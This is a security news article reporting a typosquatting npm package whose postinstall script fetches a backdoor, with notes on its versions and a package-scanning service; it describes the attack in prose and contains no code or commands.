Malicious actors are increasingly targeting open-source public repositories with malware cloaked in legitimate packages, which frequently steals sensitive data or downloads more malware.
Security researchers constantly identify and report such malicious packages to repository maintainers for removal, as the vast scale of these repositories makes it impossible to detect all threats, leaving many suspicious packages unnoticed.
A recent npm package (legacyreact-aws-s3-typescript@1.2.4) was flagged as malicious due to its postinstall script, which downloads and executes a second-stage ELF file, which, upon analysis, turned out to be a backdoor.
The backdoor connects to a specific IP address and can receive commands through a standard shell, as researchers reported the package to NPM for further investigation.
A new free service, Spectra Assure Community, is introduced to help developers assess the risk of open-source packages before deployment, by scanning popular repositories like npm for suspicious behaviors, such as the recently discovered package “legacyreact-aws-s3-typescript” on npm.
This malicious package mimicked a legitimate one named “react-aws-s3-typescript” but had dormant malicious code. Spectra Assure Community aims to prevent such software supply chain attacks by offering visibility into potential threats within open-source packages.
Malicious actors published an npm package named legacyreact-aws-s3-typescript that typosquats the legitimate react-aws-s3-typescript package. Both packages have identical landing pages and functionalities, but the malicious one contains copied and pasted code.
To further increase legitimacy, the malicious package has the same version number (1.1.5) as the last version of the legitimate package, while being published much later, which suggests that the malicious package is trying to trick developers into thinking it’s a legitimate update.
Researchers at Reversing Labs identified a malicious package, legacyreact-aws-s3-typescript, on npm, which initially had clean versions with unusual postinstall scripts. Later, suspicious versions were uploaded and removed quickly.
Malicious versions (1.2.1, 1.2.2, and likely 1.1.9) containing the same malicious code as the eventually detected version 1.2.4 were also uploaded briefly, which highlights the challenge of tracking open-source threats due to the presence of seemingly legitimate initial versions and the fleeting appearance of malicious ones.